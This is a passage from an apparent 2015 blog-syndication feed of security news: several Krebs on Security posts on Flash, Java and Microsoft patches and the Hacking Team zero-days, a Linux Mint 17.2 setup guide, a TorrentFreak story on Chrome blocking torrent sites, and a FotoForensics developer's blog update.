[3] http://krebsonsecurity.com/2015/02/yet-another-flash-patch-fixes-zero-day-flaw/
[4] http://arstechnica.co.uk/information-technology/2015/06/google-chrome-will-soon-intelligently-block-auto-playing-flash-ads/
[5] http://arstechnica.com/security/2015/07/firefox-blacklists-flash-player-due-to-unpatched-0-day-vulnerabilities/
[6] https://twitter.com/alexstamos/status/620306643360706561
[7] http://malware-traffic-analysis.net/2013/06/18/index.html
[8] http://www.symantec.com/connect/blogs/six-months-after-blackhole-passing-exploit-kit-torch
[9] http://malware-traffic-analysis.net/2014/09/16/index2.html
[10] http://malware-traffic-analysis.net/2014/08/30/index.html
[11] http://malware-traffic-analysis.net/2014/09/08/index2.html
[12] http://malware-traffic-analysis.net/2014/08/15/index.html
[13] http://malware-traffic-analysis.net/2014/09/25/index.html
[14] http://malware-traffic-analysis.net/2014/09/06/index.html
[15] http://malware.dontneedcoffee.com/2015/07/cve-2015-5122-hackingteam-0d-two-flash.html
[16] https://isc.sans.edu/forums/diary/Another+example+of+Angler+exploit+kit+pushing+CryptoWall+30/19863/

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Krebs on Security: Adobe, MS, Oracle Push Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

This being the second Tuesday of the month, it’s officially Patch Tuesday. But it’s not just Microsoft Windows users who need to update today: Adobe has released fixes for several products, including a Flash Player bundle that patches two vulnerabilities for which exploit code is available online. Separately, Oracle issued a critical patch update that plugs more than two dozen security holes in Java.

ADOBE

Adobe’s Flash patch brings Flash to version 18.0.0.209 on Windows and Mac systems. This newest release fixes two vulnerabilities that were discovered as part of the Hacking Team breach. Both flaws are exploitable via code that is already published online, so if you must use Flash please take a moment to update this program.

If you're unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to the latest version. To force the installation of an available update on Chrome, click the triple bar icon to the right of the address bar, select “About Google Chrome”, click the apply update button and restart the browser.

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox, Opera).

Please consider whether you really need Flash installed. It is a powerful program that is being massively leveraged by cybercriminals to break into systems. Monday’s post includes more information on how to remove Flash from your computer, depending on what operating system you use.

Adobe also issued security updates for Adobe Acrobat and its PDF Reader programs that fix at least 46 vulnerabilities in these products. Links to the latest versions of both programs are available in the Acrobat/Reader security advisory.

Finally, Adobe released a security update for its Shockwave Player software for Windows and Mac. This is another Adobe product that I have long urged people to uninstall, largely because most users have no need for Shockwave and it’s just as buggy as Flash but it doesn’t get updated nearly enough. In any case, links to the latest version of Shockwave are available in the advisory.

MICROSOFT

With today's 14 patch bundles, Microsoft fixed dozens of vulnerabilities in Windows and related software. A cumulative patch for Internet Explorer corrects at least 28 flaws in the default Windows browser. Three of those IE flaws were disclosed prior to today's patches, including one zero-day flaw uncovered in the Hacking Team breach.

Most of these IE bugs are browse-and-get-owned vulnerabilities, meaning IE users can infect their systems merely by browsing to a hacked or malicious Web site.

Another noteworthy update fixes at least eight flaws in various versions of Microsoft Office, including one (CVE-2424) that is actively being exploited by attackers.

More detailed summaries of the Microsoft patches released today can be found at Microsoft’s Security Bulletin Summary for July 2015, and at the Qualys blog.

ORACLE

Oracle’s patch for Java SE includes fixes for 25 security vulnerabilities, including a flaw that is already being actively exploited to break into systems running Java SE. A blog post by Trend Micro has more on the Java zero-day flaw, which was apparently used in targeted attacks in a cyber espionage campaign.

The latest version, Java 8 Update 51, is available from Java.com. But if you use Java, please take a moment to consider whether you still need this program on your computer. Java is yet another program that I have long urged users to do without, for most of the same reasons I've urged readers to ditch Flash and Shockwave: this widely installed and powerful program is riddled with security holes, and is a top target of malware writers and miscreants.

If you have an affirmative use or need for Java, there is a way to have this program installed while minimizing the chance that crooks will exploit unknown or unpatched flaws in the program: unplug it from the browser unless and until you’re at a site that requires it (or at least take advantage of click-to-play, which can block Web sites from displaying both Java and Flash content by default).

The latest versions of Java let users disable Java content in web browsers through the Java Control Panel. Alternatively, consider a dual-browser approach, unplugging Java from the browser you use for everyday surfing, and leaving it plugged in to a second browser that you only use for sites that require Java.

Many people confuse Java with JavaScript, a powerful scripting language that helps make sites interactive. Unfortunately, a huge percentage of Web-based attacks use JavaScript tricks to foist malicious software and exploits onto site visitors. For more about ways to manage JavaScript in the browser, check out my tutorial Tools for a Safer PC.

Linux How-Tos and Linux Tutorials: 10 Things to Do After Installing Linux Mint 17.2

This post was syndicated from: Linux How-Tos and Linux Tutorials and was written by: Swapnil Bhartiya. Original post: at Linux How-Tos and Linux Tutorials

The latest version of Linux Mint is out and it’s a major improvement over the previous releases (see my recent review). Linux Mint developers do a lot of additional work, on top of its Ubuntu base, which leaves users with comparatively less work to do after installation. For example, Linux Mint comes pre-loaded with restricted drivers and codecs. It also comes with VLC so users don’t have to worry about media playback.

That said, like any other operating system, depending on your needs, you may have to do some extra work to get your Linux Mint system ready. While some of the changes in this article are optional, a few are mandatory: such as keeping your system up-to-date.

Here are 10 things to do after you install Mint 17.2.

First of all you need to update the system

Even if you downloaded the brand new Linux Mint, a lot of open source code has been written between the time it was packaged and uploaded to the server and the time you downloaded it. The first thing you must do is run a system update before installing any new package. There are two steps involved in a system update: first, you refresh the repositories so they can pull information about the latest packages, and then you upgrade any package. You can do so by running this command (you must refresh your repositories before installing any package):

sudo apt-get update

Once all the info is refreshed, run the update:

sudo apt-get upgrade

I would also recommend running “sudo apt-get dist-upgrade”, which can upgrade packages that the simple ‘upgrade’ command can't (you can read more about the difference between the two commands here).

sudo apt-get dist-upgrade

Install additional drivers

Ubuntu-based systems have made it really easy to manage drivers (both open source and non-free) for various hardware. Open the Driver Manager tool, which will scan your system and detect the supported hardware which may need non-free drivers. It will then offer appropriate drivers for it and you can install the desired drivers for your hardware.

Install Google Chrome?

Looking at the vulnerabilities that Adobe's Flash player has (one was disclosed and fixed this week), I would suggest staying away from the Flash plugin and instead using Google Chrome, which comes with Flash support. You can download Google Chrome from their site and install it the way you would install any binary package; just make sure to choose the right architecture (32-bit or 64-bit for Ubuntu). There are additional benefits of using Chrome: it will also allow you to access services like Netflix which are not available for Firefox. On top of that, you will also gain access to the supported Chrome Apps from the Web Store.

Install Cloud services

Google Drive is still not available for Linux, but there is a third-party solution called inSync which can be used to integrate Google Drive with your Linux Mint system. It's a nifty solution which, unlike Google Drive, does have a one-time fee. You can easily install inSync either by downloading the binary or by adding its repository to the system from the official download page. I would strongly suggest never installing any software from unofficial or third-party sites.

These are not the only solutions for Linux users. Almost all major cloud services (except for Microsoft OneDrive) are available for Linux users. You can easily install Dropbox, ownCloud or Seafile on your system by downloading the binaries from the official sites.

Change search engine to Google

The Linux Mint team has commercial deals with several search providers which share revenues with the project. These search engines have been integrated with the Firefox browser, Yahoo! being the default one. That doesn’t mean you are locked into the default search engine Yahoo! which is powered by Microsoft Bing.

In my experience I found that the option to switch to Google has been buried deep, making it a tad difficult for a new user to switch. After struggling with it for a while I settled on an easier solution, and that's what I would recommend to others. Open Firefox and visit ‘www.google.com’; you will notice a blue ribbon offering to change your search engine to Google.


Click on ‘Yes, show me’ from the ribbon. Next click on the + icon on the search box and add Google.

Adding Google as your default search in Firefox

Then click on ‘Change Search Settings’ and choose Google from the list.

Step 3 in changing your default search to Google.

You may also want to un-check ‘provide search suggestions’ so that your search box is clean and clutter free.

Now all your searches belong to Google.

Sync and protect your password with Firefox

There is now a built-in feature of Firefox which can save your passwords (and much more) securely on their servers so you won’t have to write them down or remember them. Open Firefox and then click on the three bars on the right.


There you will see the option ‘sign in to sync’. Follow the instructions and you are all set. You can choose what kind of stuff you want to be synced, which includes passwords, bookmarks, tabs, history, add-ons and preferences. The good news is you won't have to reinstall all add-ons and change preferences when you change OS or move between systems. Once you log into the Firefox account, everything will be synced across machines.

Use Thunderbird Profile

I am a heavy Thunderbird user and use it to its full potential; thanks to add-ons like calendar. One of the lesser known, but most interesting, features of Thunderbird is the ability to easily change the location of data on the system. Now the question would be: why would I need it? I multi-boot with different distributions and it’s a waste of time to set-up Thunderbird in each distro and then waste precious space on the ‘home’ of each distro, only to have multiple copies of the same data on the same system.

I keep all of my data on a separate hard drive, outside ‘home’ directories. This drive is accessible by all distros, which makes it easier to work on the same files irrespective of the OS I am currently running. And that’s where I keep my Thunderbird data; so the same data is accessible across all distros eliminating duplication.

I use the ‘Profile’ feature of Thunderbird to achieve this. It also comes in handy when you hop from one distro to another as you won’t have to reconfigure your Thunderbird on each new distro.

It's recommended to set up a profile before you run Thunderbird for the first time. To configure a Thunderbird profile, open Terminal and run this command:

thunderbird -p

You will be greeted by this window.

Linux Mint Thunderbird profile window.

Click on ‘Create Profile’, give it a name and then ‘Choose Folder’. This will be the directory where all of your Thunderbird data will be saved. Once done, click on ‘Finish’ and you are set. Next time you boot into another system, run the same command, create the profile and then point it to the folder you created previously. All your email accounts, settings, and add-ons will be there, automatically. If you run multiple distros, just create a profile on each distro and point it to the same directory.

Setting up Trackpad

I did find it a bit frustrating to connect the Magic Trackpad to Linux Mint 17.2. Linux Mint asks you to enter a PIN when you try to connect devices like the Trackpad; a task you can't perform from a trackpad. What you need to do is choose the PIN option and try with ‘0000’, which ‘might’ connect the device. I had to make several attempts because the moment the device was detected it would switch to the default ‘enter PIN’ option. I think Linux Mint should make it easy to connect such devices. When I tried it on Mac OS X, it detected that it was a Trackpad and, instead of offering to enter a PIN, defaulted to ‘0000’ and paired with the device immediately.

Configuring the trackpad

Another issue I faced with the Trackpad was that scrolling was not working out of the box. To enable that, open System Settings, go to the TouchPad settings and select ‘Vertical Scrolling’ (it should be selected by default).

Once you have enabled that, you will find that it's not working in Firefox. To get it to work, open a Firefox browser and type ‘about:config’ in the address bar. Firefox will throw a warning at you – ignore it and proceed. Then search for ‘gesture.swipe’ and you will come across four results. Click on each, one by one, and delete the ‘value’ field; scrolling will start working in Firefox.

How to upgrade from the previous version

If you are still on Linux Mint 17.1, then you won't have to re-format your system and run a fresh install of Linux Mint 17.2. Now you can easily upgrade between major releases. Before running such an upgrade make sure to back up your data so that, in case of a failed update, you don't lose it. Run a system update to ensure all your packages are up-to-date. If there are applications that you don't need, uninstall them to keep your system lean and mean.

Let’s start the major upgrade: Open ‘Update Manager’, refresh it, and install all the checked packages there.


Once everything is up-to-date, click on the ‘Edit’ menu and choose the third option (if available) to upgrade to the next release.


Then just follow the instructions and enjoy the latest version of Linux Mint.

That's pretty much all that you need to do on Linux Mint to get the most out of this great Linux distribution. There used to be a long list of things ‘to do’ after installing Linux Mint, but these days most things, such as configuring printers, work out of the box.

Now it's your turn: let us know what things you do after installing Linux Mint!

Krebs on Security: Third Hacking Team Flash Zero-Day Found

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

For the third time in a week, researchers have discovered a zero-day vulnerability in Adobe’s Flash Player browser plugin. Like the previous two discoveries, this one came to light only after hackers dumped online huge troves of documents stolen from Hacking Team — an Italian security firm that sells software exploits to governments around the world.

News of the latest Flash flaw comes from Trend Micro, which said it reported the bug (CVE-2015-5123) to Adobe’s Security Team. Adobe confirmed that it is working on a patch for the two outstanding zero-day vulnerabilities exposed in the Hacking Team breach.

We are likely to continue to see additional Flash zero day bugs surface as a result of this breach. Instead of waiting for Adobe to fix yet another flaw in Flash, please consider removing or at least hobbling this program.


Google Chrome comes with its own version of Flash pre-installed, but disabling it is easy enough. On a Windows, Mac, Linux or Chrome OS installation of Chrome, type “chrome:plugins” into the address bar, and on the Plug-ins page look for the “Flash” listing: To disable Flash, click the disable link (to re-enable it, click “enable”).

Windows users can remove Flash from non-Chrome browsers from the Add/Remove Programs panel, and/or using this Flash Removal Tool. Note that you must exit out of all Web browsers before running the tool. To verify that Flash has been removed, visit this page; if it says your browser needs Flash, you’ve successfully removed it.

For Mac users, AppleInsider carries a story today that has solid instructions for nixing the program from OS X once and for all.

“Flash has become such an information security nightmare that Facebook’s Chief Security Officer called on Adobe to sunset the platform as soon as possible and ask browser vendors to forcibly kill it off,” AppleInsider’s Shane Cole writes. “Though most exploits are targeted at Windows, Mac users are not invincible.”

I removed Flash entirely more than a month ago and haven't missed the program one bit. Unfortunately, some sites — including many government Web sites — may prompt users to install Flash in order to view certain content. Perhaps it's time for a petition to remove Flash Player from U.S. Government Web sites altogether? If you agree, make your voice heard here. For more on spreading the word about Flash, see the campaign at OccupyFlash.org.

If you decide that removing Flash altogether or disabling it until needed is impractical, there are in-between solutions. Script-blocking applications like Noscript and ScriptSafe are useful in blocking Flash content, but script blockers can be challenging for many users to handle.

Another approach is click-to-play, which is a feature available for most browsers (except IE, sadly) that blocks Flash content from loading by default, replacing the content on Web sites with a blank box. With click-to-play, users who wish to view the blocked content need only click the boxes to enable Flash content inside of them (click-to-play also blocks Java applets from loading by default).

Windows users who decide to keep Flash installed and/or enabled also should take full advantage of the Enhanced Mitigation Experience Toolkit (EMET), a free tool from Microsoft that can help Windows users beef up the security of third-party applications.

TorrentFreak: Chrome Blocks Major Torrent Sites Over “Harmful Programs”

This post was syndicated from: TorrentFreak and was written by: Ernesto. Original post: at TorrentFreak

There's a slight panic breaking out among Google Chrome users. Over the past few hours the browser has started to block access to several of the most popular torrent sites including KickassTorrents, Torrentz, ExtraTorrent and RARBG.

Instead of a page filled with the latest torrents, visitors are presented with an ominous red warning banner.

“The site ahead contains harmful programs,” Google Chrome informs its users.

“Attackers on kat.cr might attempt to trick you into installing programs that harm your browsing experience (for example, by changing your homepage or showing extra ads on sites you visit),” the warning adds.


Google doesn't specify what the issue is with the sites in question. The “Safe Browsing” diagnostics pages only list the sites as “suspicious” and note that, in some cases, “third parties can add malicious code to legitimate sites.”


The owners of the sites in question are clueless about the source of the problem. RARBG’s operator informs TF that there is no additional information available in Google’s Webmaster tools either.

“I hope Google comes to its senses and actually allows webmasters to see what the issue is in their webmasters tools,” RARBG’s operator informs us.

ExtraTorrent is not aware of any issues either and notes that the malware Google reportedly found is a false positive.

“There is no malicious software and you are still able to load ExtraTorrent in Mozilla Firefox, Opera, Chromium and other browsers,” the ExtraTorrent team says.

“We’ll contact Google to resolve the issue shortly,” they add.

Interestingly, several proxy sites, such as torrentz-proxy.com, still work fine and don’t show the warning screen in Google Chrome.

Since Google doesn’t mention “malicious software” as the reason for the warning, it was most likely triggered by the “unsafe” ads many torrent sites run. These are typically linked to toolbar software or other unwanted programs.

We reached out to Google to find out more about the sudden torrent site blocks, but we have yet to receive a response.

Chrome users who want to bypass the warning can do so by clicking the details link, or by disabling Chrome's malware warnings altogether.

Source: TorrentFreak, for the latest info on copyright, file-sharing, torrent sites and the best VPN services.

Krebs on Security: Adobe to Patch Hacking Team’s Flash Zero-Day

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe Systems Inc. says it plans to issue a patch on Wednesday to fix a zero-day vulnerability in its Flash Player software that is reportedly being exploited in active attacks. The flaw was disclosed publicly over the weekend after hackers broke into and posted online hundreds of gigabytes of data from Hacking Team, a controversial Italian company that's long been accused of helping repressive regimes spy on dissident groups.


A knowledge base file stolen from Hacking Team explaining how to use a Flash exploit developed by the company.

In an advisory published today, Adobe said “a critical vulnerability (CVE-2015-5119) has been identified in Adobe Flash Player 18.0.0.194 and earlier versions for Windows, Macintosh and Linux. Successful exploitation could cause a crash and potentially allow an attacker to take control of the affected system.”

Several reports on Twitter suggested the exploit could be used to bypass Google Chrome's protective “sandbox” technology, a security feature that forces the program to run in a heightened security mode designed to block attacks that target vulnerabilities in Flash. A spokesperson for Google confirmed that attackers could evade the Chrome sandbox by using the Flash exploit in tandem with another Windows vulnerability that appears to be unpatched at the moment. Google also says it's already in the process of pushing the Flash fix out to Chrome users.

The Flash flaw was uncovered after Hacking Team’s proprietary information was posted online by hacktivists seeking to disprove the company’s claims that it does not work with repressive regimes (the leaked data suggests that Hacking Team has contracted to develop exploits for a variety of countries, including Egypt, Lebanon, Ethiopia, Sudan and Thailand). Included in the cache are several exploits for unpatched flaws, including apparently a Windows vulnerability.

According to new research from security firm Trend Micro, there is evidence that the Flash bug is being exploited in active attacks.

“A separate attack against one of these vulnerabilities shows that not sharing the discovery of vulnerabilities with the vendor or broader security community leaves everyone at risk,” wrote Christopher Budd, global threat communications manager at Trend. “This latest attack is yet another demonstration that Adobe is a prime target for exploit across commercial and consumer IT systems.”

There is no question that Adobe Flash Player is a major target of attackers. This Wednesday will mark the seventh time in as many months that Adobe has issued an emergency update to fix a zero-day flaw in Flash Player (the last one was on June 23).

Perhaps a more sane approach to incessantly patching Flash Player is to remove it altogether. Late last month, I blogged about my experience doing just that, and found I didn’t miss the program much at all. In any case, I’ll update this post once Adobe has issued an official fix.

Krebs on Security: Emergency Patch for Adobe Flash Zero-Day

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe Systems Inc. today released an emergency update to fix a dangerous security hole in its widely-installed Flash Player browser plugin. The company warned that the vulnerability is already being exploited in targeted attacks, and urged users to update the program as quickly as possible.

In an advisory issued Tuesday morning, Adobe said the latest version of Flash — v. 18.0.0.194 on Windows and Mac OS X — fixes a critical flaw (CVE-2015-3113) that is being actively exploited in “limited, targeted attacks.” The company said systems running Internet Explorer for Windows 7 and below, as well as Firefox on Windows XP, are known targets of these exploits.

If you're unsure whether your browser has Flash installed or what version it may be running, browse to this link. Adobe Flash Player installed with Google Chrome, as well as Internet Explorer on Windows 8.x, should automatically update to the latest version. To force the installation of an available update on Chrome, click the triple bar icon to the right of the address bar, select “About Google Chrome”, click the apply update button and restart the browser.

The most recent versions of Flash should be available from the Flash home page, but beware potentially unwanted add-ons, like McAfee Security Scan. To avoid this, uncheck the pre-checked box before downloading, or grab your OS-specific Flash download from here. Windows users who browse the Web with anything other than Internet Explorer may need to apply this patch twice, once with IE and again using the alternative browser (e.g., Firefox, Opera).

In lieu of patching Flash Player yet again, it might be worth considering whether you really need to keep Flash Player installed at all. In a happy coincidence, earlier today I published a piece about my experience going a month without having Flash Player installed. The result? I hardly missed it at all.

Krebs on Security: A Month Without Adobe Flash Player

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

I’ve spent the better part of the last month running a little experiment to see how much I would miss Adobe‘s buggy and insecure Flash Player software if I removed it from my systems altogether. Turns out, not so much.

Browser plugins are favorite targets for malware and miscreants because they are generally full of unpatched or undocumented security holes that cybercrooks can use to seize complete control over vulnerable systems. The Flash Player plugin is a stellar example of this: It is among the most widely used browser plugins, and it requires monthly patching (if not more frequently).

It’s also not uncommon for Adobe to release emergency fixes for the software to patch flaws that bad guys started exploiting before Adobe even knew about the bugs. This happened most recently in February 2015, and twice the month prior. Adobe also shipped out-of-band Flash fixes in December and November 2014.

Time was, Oracle's Java plugin was the favorite target of exploit kits, software tools made to be stitched into hacked or malicious sites and foist on visiting browsers a kitchen sink of exploits for various plugin vulnerabilities. Lately, however, it seems the pendulum has swung back in favor of exploits for Flash Player. A popular exploit kit known as Angler, for example, bundled a new exploit for a Flash vulnerability just three days after Adobe fixed it in April 2015.

So, rather than continue the patch madness and keep this insecure software installed, I decided to pull the…er…plugin. I tend to (ab)use different browsers for different tasks, and so uninstalling the plugin was almost as simple as uninstalling Flash, except with Chrome, which bundles its own version of Flash Player. Fear not: disabling Flash in Chrome is simple enough. On a Windows, Mac, Linux or Chrome OS installation of Chrome, type “chrome:plugins” into the address bar, and on the Plug-ins page look for the “Flash” listing: To disable Flash, click the disable link (to re-enable it, click “enable”).

In almost 30 days, I ran into just two instances where I encountered a site hosting a video that I absolutely needed to watch and that required Flash (an instructional video for a home gym that I could find nowhere else, and a live-streamed legislative hearing). For these, I opted to cheat and load the content into a Flash-enabled browser inside of a Linux virtual machine I have running inside of VirtualBox. In hindsight, it probably would have been easier simply to temporarily re-enable Flash in Chrome, and then disable it again until the need arose.

If you decide that removing Flash altogether or disabling it until needed is impractical, there are in-between solutions. Script-blocking applications like Noscript and ScriptSafe are useful in blocking Flash content, but script blockers can be challenging for many users to handle.

Another approach is click-to-play, which is a feature available for most browsers (except IE, sadly) that blocks Flash content from loading by default, replacing the content on Web sites with a blank box. With click-to-play, users who wish to view the blocked content need only click the boxes to enable Flash content inside of them (click-to-play also blocks Java applets from loading by default).

Windows users who decide to keep Flash installed and/or enabled also should take full advantage of the Enhanced Mitigation Experience Toolkit (EMET), a free tool from Microsoft that can help Windows users beef up the security of third-party applications.

Krebs on Security: Critical Flaws in Apple, Samsung Devices

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Normally, I don’t cover vulnerabilities about which the user can do little or nothing to prevent, but two newly detailed flaws affecting hundreds of millions of Android, iOS and Apple products probably deserve special exceptions.

The first is a zero-day bug in iOS and OS X that allows the theft of both Keychain (Apple’s password management system) and app passwords. The flaw, first revealed in an academic paper (PDF) released by researchers from Indiana University, Peking University and the Georgia Institute of Technology, involves a vulnerability in Apple’s latest operating system versions that enables an app approved for download by the Apple Store to gain unauthorized access to other apps’ sensitive data.

“More specifically, we found that the inter-app interaction services, including the keychain…can be exploited…to steal such confidential information as the passwords for iCloud, email and bank, and the secret token of Evernote,” the researchers wrote.

The team said they tested their findings by circumventing the restrictive security checks of the Apple Store, and that their attack apps were approved by the App Store in January 2015. According to the researchers, more than 88 percent of apps were “completely exposed” to the attack.

News of the research was first reported by The Register, which reported that Apple was first notified in October 2014 and that in February 2015 the company asked researchers to hold off disclosure for six months.

“The team was able to raid banking credentials from Google Chrome on the latest Mac OS X 10.10.3, using a sandboxed app to steal the system’s keychain and secret iCloud tokens, and passwords from password vaults,” The Register wrote. “Google’s Chromium security team was more responsive and removed Keychain integration for Chrome noting that it could likely not be solved at the application level. AgileBits, owner of popular software 1Password, said it could not find a way to ward off the attacks or make the malware ‘work harder’ some four months after disclosure.”

A story at 9to5mac.com suggests the malware the researchers created to run their experiments can’t directly access existing keychain entries, but instead does so indirectly by forcing users to log in manually and then capturing those credentials in a newly-created entry.

“For now, the best advice would appear to be cautious in downloading apps from unknown developers – even from the iOS and Mac App Stores – and to be alert to any occasion where you are asked to login manually when that login is usually done by Keychain,” 9to5’s Ben Lovejoy writes.

SAMSUNG KEYBOARD FLAW

Separately, researchers at mobile security firm NowSecure disclosed they’d found a serious vulnerability in a third-party keyboard app that is pre-installed on more than 600 million Samsung mobile devices — including the recently released Galaxy S6 — that allows attackers to remotely access resources like GPS, camera and microphone, secretly install malicious apps, eavesdrop on incoming/outgoing messages or voice calls, and access pictures and text messages on vulnerable devices.

The vulnerability in this case resides with an app called SwiftKey keyboard, which according to researcher Ryan Welton runs from a privileged account on Samsung devices. The flaw can be exploited if the attacker can control or compromise the network to which the device is connected, such as a wireless hotspot or local network.

“This means that the keyboard was signed with Samsung’s private signing key and runs in one of the most privileged contexts on the device, system user, which is a notch short of being root,” Welton wrote in a blog post about the flaw, which was first disclosed at Black Hat London on Tuesday, along with the release of proof-of-concept code.

Welton said NowSecure alerted Samsung in November 2014, and that at the end of March Samsung reported a patch released to mobile carriers for Android 4.2 and newer, but requested an additional three months deferral for public disclosure. Google’s Android security team was alerted in December 2014.

“While Samsung began providing a patch to mobile network operators in early 2015, it is unknown if the carriers have provided the patch to the devices on their network,” Welton said. “In addition, it is difficult to determine how many mobile device users remain vulnerable, given the device models and number of network operators globally.” NowSecure has released a list of Samsung devices indexed by carrier and their individual patch status.

Samsung issued a statement saying it takes emerging security threats very seriously.

“Samsung KNOX has the capability to update the security policy of the phones, over-the-air, to invalidate any potential vulnerabilities caused by this issue. The security policy updates will begin rolling out in a few days,” the company said. “In addition to the security policy update, we are also working with SwiftKey to address potential risks going forward.”

A spokesperson for Google said the company took steps to mitigate the issue with the release of Android 5.0 in November 2014.

“Although these are most accurately characterized as application level issues, back with Android 5.0, we took proactive measures to reduce the risk of the issues being exploited,” Google said in a statement emailed to KrebsOnSecurity. “For the longer term, we are also in the process of reaching out to developers to ensure they follow best practices for secure application development.”

SwiftKey released a statement emphasizing that the company only became aware of the problem this week, and that it does not affect its keyboard applications available on Google Play or Apple App Store. “We are doing everything we can to support our long-time partner Samsung in their efforts to resolve this important security issue,” SwiftKey said in a blog post.

The Hacker Factor Blog: Late Night Programming

This post was syndicated from: The Hacker Factor Blog and was written by: The Hacker Factor Blog. Original post: at The Hacker Factor Blog

I’ve been spending my evenings working on various tweaks and possible enhancements to the FotoForensics site. Some of these experiments have worked out really well, some have a few problems, and some are still in the “learning curve” phase.

Associations

One of my fun projects is related to the trend detector. I am using vis.js to display relationships that represent various types of trends. This results in very cool association graphs!

This snapshot shows related clusters that formed after three days. The actual graph is interactive. I can click on any node to identify more information about it. I like the way it displays and it really helps identify various clusters of related data. However, this tool really isn’t practical for a public release because of two big problems.

The first problem is speed. If there are only a few nodes, then it renders very quickly. A few hundred makes it pause before displaying as it initially stabilizes the graph. But a few thousand? Start it up and go to lunch… it should be done when you get back. While vis.js does a great job at visualizing the data, this JavaScript library really isn’t fast enough for my data set. Ideally, I want to generate this kind of association graph with 10,000 nodes or more, but the browser really can’t handle it. (Vis.js has an option to group clusters until you zoom in, but that loses the global visual representation.)

The second problem is specifically a browser issue. The vis.js library uses a canvas element for rendering. On my old Chrome 21.x browser, it renders great! Fast and easy to use. However, the default Chromium for Ubuntu 14.04 (Chromium 5) won’t render anything — you just see a black background and it complains about a JavaScript error in vis.js (but there is no error). Chrome 43 for Windows and Firefox 37 for Ubuntu both have memory leaks related to the canvas tag. They will render the first graph without a problem. If you reload the page and open another graph, then it becomes slow. A third reload makes it horribly slow. And by the 4th or 5th reload, the browser hangs. Even closing the tab (but not the browser) between reloads is not enough to resolve this issue.

I’m not the only person to notice this memory leak. It seems to impact newer versions of Firefox, Chrome, and Chromium, dating back more than a year. (Examples: #1, #2, #3.) I suspect that Safari and other WebKit browsers may have the same problem.

And before someone asks… Yes, I tried the latest-greatest versions of Chrome and Firefox. Both crash on Ubuntu 14.04 before they can load any pages. (These are unstable browser ports.) On Windows, they still have the memory leak. For right now, I’m only using this vis.js code on an old Chrome browser that predates the memory leak. Ideally I’d like an interactive web-based solution that can handle 10,000 nodes, but that doesn’t seem likely in the near future.

Streaming

I’ve been spending some time trying to wrap my head around WebRTC. That’s the interactive web technology that permits video and audio sharing. My long-term goal is to configure a WebRTC server for FotoForensics, where I can share my browser window and conduct online training sessions for specific clients, research partners, and occasional guests. (This isn’t intended for the public FotoForensics server. This is more for the private servers that have more features and really requires training sessions.)

I’ve finally wrapped my head around the WebRTC, STUN, and TURN relationships that are required for enabling this technology. There are dozens of web pages with overviews and tutorials, but none of them are very good or detailed. And I still need to figure out how to do things like encryption. (Some docs say that the traffic is automagically encrypted, but I cannot find details about how this works.)

Installing, configuring, and deploying is another complex issue. While there are a few ready-to-go installation packages, I haven’t found them easy to customize. For example, I have my own login management system but I cannot figure out how to integrate it. I want to make sure users cannot create their own private chat rooms, but most code enables arbitrary room allocations. And I want to share either an app (browser) or a desktop and not a video camera, but I cannot figure out how to do that. In some cases, I may just want to share audio without video, or audio with a text-chat window. In other cases, I want users to be able to share their desktops with me so that I can help diagnose content. But I haven’t figured out how to do any of these either.

I have also played with external systems, like Google Hangouts, GoToMeeting, and WebEx. I like the speed, I like the flow, and I like the features like a text-based chat window and Hangout’s live annotations. But I don’t like the idea of sending anything related to my technologies through a third party; all communications should go direct from my server and my desktop computer to the other member’s computers. I want no dependencies on any external third-party services. Also, anything that requires installing special software as a plugin or an app is a show-stopper. I need to support a lot of different platforms, and requiring every user to install a plugin or app is not a platform independent solution.

Clouds

Outside of the graphical arena, I’ve been looking more at the various users who attack my site or violate the terms of service. If I can identify trends, then I can address them and cut down on abuses.

Recently I noticed that some of these abusers are using cloud service providers. So, I decided to map out which services they use. I really expected them to be evenly distributed across the various cloud solutions, but that is definitely not the case.

Some of the biggest cloud providers, like CloudFlare, Rackspace, Softlayer, and Microsoft’s Azure, do not show up at all in my lists of abusive sources. I assume that this means that they are very good at policing their users. (Either that, or these services are too expensive for the riff raff.) The cloud services offered by Google and Amazon do not have many violators, but nearly all of their violators are associated with hostile network attacks. These are systems that are explicitly trying to compromise other online computers. And in the case of Google, they have a few hostile accounts that have been going at it for at least a few months. Either these cloud services have not noticed that their users are hostile, or do not care about stopping outbound attacks.

In contrast to Google and Amazon, Versaweb, GTT/nLayer, and a few others are mostly associated with proxies that are used to violate my terms of service. (I.e., porn uploaders.) This makes it really easy to identify and I can flag their content as potential violations. I should have a new autoban rule implemented in the near future.

More Changes

I’m still trying to finish up and deploy a few other technologies. Some of these will better protect my site, while others will make the site more convenient for users and analysts. Whenever I deploy an improvement to the site, I end up learning something new, and that may lead to additional fun research topics. I am definitely looking forward to these behind-the-scenes updates and whatever surprises they may bring.

Krebs on Security: Adobe, Microsoft Issue Critical Security Fixes

This post was syndicated from: Krebs on Security and was written by: BrianKrebs. Original post: at Krebs on Security

Adobe today released software updates to plug at least 13 security holes in its Flash Player software. Separately, Microsoft pushed out fixes for at least three dozen flaws in Windows and associated software.

The bulk of the flaws Microsoft addressed today (23 of them) reside in the Internet Explorer Web browser. Microsoft also issued fixes for serious problems in Office, the Windows OS itself and Windows Media Player, among other components. A link to an index of the individual Microsoft updates released today is here.

As it normally does on Patch Tuesday, Adobe issued fixes for its Flash and AIR software, plugging a slew of dangerous flaws in both products. Flash continues to be one of the more complex programs to manage and update on a computer, mainly because its auto-update function tends to lag the actual patches by several days at least (your mileage may vary), and it’s difficult to know which version is the latest.

